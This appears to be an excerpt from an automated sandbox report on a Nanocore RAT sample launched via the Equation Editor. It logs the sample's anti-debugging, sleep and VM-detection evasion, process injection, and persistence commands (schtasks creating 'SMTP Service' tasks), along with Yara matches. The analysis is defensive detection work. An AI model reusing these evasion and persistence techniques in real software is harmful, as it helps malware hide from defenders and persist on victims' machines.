Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: threadDelayed 7741			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: threadDelayed 1930			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: foregroundWindowGot 372			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: foregroundWindowGot 357			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Window / User API: foregroundWindowGot 576			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 920	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2928	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2856	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2376	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 3024	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 3068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2424	Thread sleep time: -120000s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2512	Thread sleep time: -922337203685477s >= -30000s

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\JNM.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\AppData\Roaming\JNM.exe

Code function: 3_2_00400AC4 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,00408D77,00000000,00000000

3_2_00400AC4

Hides threads from debuggers

Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread information set: HideFromDebugger			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\JNM.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Roaming\JNM.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Memory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

May try to detect the Windows Explorer process (often used for injection)

Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JNM.exe	Queries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Roaming\JNM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Source: JNM.exe, 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: JNM.exe, 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: JNM.exe, 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: JNM.exe, 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
Source: Yara match	File source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE